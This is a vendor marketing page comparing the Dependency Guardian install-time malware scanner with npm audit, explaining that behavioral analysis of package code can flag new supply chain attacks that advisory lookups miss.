Compare
Dependency Guardian vs npm audit: known CVEs vs malicious behavior
npm audit checks your installed dependencies against the npm advisory database — a list of vulnerabilities that have already been reported and assigned an advisory. Dependency Guardian reads the package's actual published code for malicious behavior before it installs. The difference matters most for a brand-new attack, which by definition has no advisory yet.
| Dependency Guardian | npm audit | |
|---|---|---|
| What it checks | The package's published code and runtime behavior | Your dependency tree against reported advisoriesSource: npm Docs: About audit reports |
| Catches a zero-day supply chain attack | Yes — behavior is visible before any advisory exists | Not until an advisory is published for it |
| Detection method | Behavioral static analysis plus sandbox routing | Database lookup of known CVEs/advisories |
| Enforcement point | At install time — a malicious package is refused | A report after install; no install-time blockSource: npm Docs: About audit reports |
| Cost | Free tier, no signup for the CLI scanner | Built into npm, free |
Different questions, not better and worse
npm audit is genuinely useful and it is free and already in your toolchain — it tells you which of your dependencies have a reported vulnerability so you can patch them. What it cannot do is tell you that a package you are about to install is malicious, because malicious packages do not file advisories against themselves. The interesting supply chain malware — a postinstall script that reads your AWS credentials, an obfuscated payload that phones home — is live and spreading during the hours or days before anyone reports it.
Dependency Guardian is looking at behavior, not reports, so it can flag that package on first sight. The two are complementary: keep running npm audit for known-CVE hygiene, and add a behavioral install-time gate for the attacks audit structurally cannot see.
Where npm audit is enough
If your only concern is keeping up with disclosed vulnerabilities in well-known packages, and you are comfortable with a report you act on rather than a block at install time, npm audit covers that and costs nothing. You do not need a behavioral scanner to learn that an old lodash has a prototype pollution advisory.
One limitation worth naming: Dependency Guardian does not replace vulnerability management. It catches malicious behavior, not every known CVE in your tree — keep npm audit or a dedicated SCA tool for disclosed-vulnerability tracking.
Questions
Is npm audit enough on its own?
For tracking disclosed vulnerabilities in your dependencies, yes. For catching a malicious package before it installs, no — npm audit only knows about threats that already have an advisory, and a fresh supply chain attack has none. Pair it with a behavioral install-time scanner to close that gap.
Does npm audit detect malware?
Not as a design goal. npm audit matches your dependency tree against the npm advisory database of reported vulnerabilities. Novel malicious packages have no advisory, so they pass npm audit until someone reports them. Dependency Guardian reads the code for malicious behavior instead, so it can flag a package on first sight.
Try the install-time firewall
Free for the CLI scanner, no signup. It reads the published artifact for malicious behavior and returns a block, warn or pass verdict before the package installs.
npm install -g @westbayberry/dg && dg scan
Deeper read: the full write-up · See the measured benchmark · all comparisons